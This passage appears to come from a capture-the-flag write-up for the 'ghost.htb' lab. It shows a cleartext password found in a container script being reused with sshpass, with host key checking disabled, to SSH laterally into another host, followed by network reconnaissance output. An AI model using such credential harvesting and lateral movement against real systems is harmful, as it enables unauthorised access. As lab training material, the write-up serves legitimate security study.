florence.ramirez
Checking the bash script located at the system root of the Docker container revealed the CLEARTEXT credential of the florence.ramirez user, it also suggests that I can move laterally to another host machine via SSH
root@621de11273cb:/# sshpass -p 'uxLmt*udNc6t3HrF' ssh -o "StrictHostKeyChecking no" florence.ramirez@ghost.htb@dev-workstation
Last login: Tue Jul 16 11:38:18 2024 from 172.18.0.3
florence.ramirez@LINUX-DEV-WS01:~$ whoami
florence.ramirez
florence.ramirez@LINUX-DEV-WS01:~$ hostname
LINUX-DEV-WS01
florence.ramirez@LINUX-DEV-WS01:~$ ip a
-bash: ip: command not found
florence.ramirez@LINUX-DEV-WS01:~$ ifconfig
-bash: ifconfig: command not found
florence.ramirez@LINUX-DEV-WS01:~$ cat /proc/net/fib_trie
Main:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.2
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCAST
Local:
+-- 0.0.0.0/0 3 0 5
|-- 0.0.0.0
/0 universe UNICAST
+-- 127.0.0.0/8 2 0 2
+-- 127.0.0.0/31 1 0 0
|-- 127.0.0.0
/8 host LOCAL
|-- 127.0.0.1
/32 host LOCAL
|-- 127.255.255.255
/32 link BROADCAST
+-- 172.18.0.0/16 2 0 2
+-- 172.18.0.0/30 2 0 2
|-- 172.18.0.0
/16 link UNICAST
|-- 172.18.0.2
/32 host LOCAL
|-- 172.18.255.255
/32 link BROADCASTLateral movement made to the LINUX-DEV-WS01.ghost.htb host as the florence.ramirez user via SSH
The LINUX-DEV-WS01.ghost.htb host appears to be another Docker container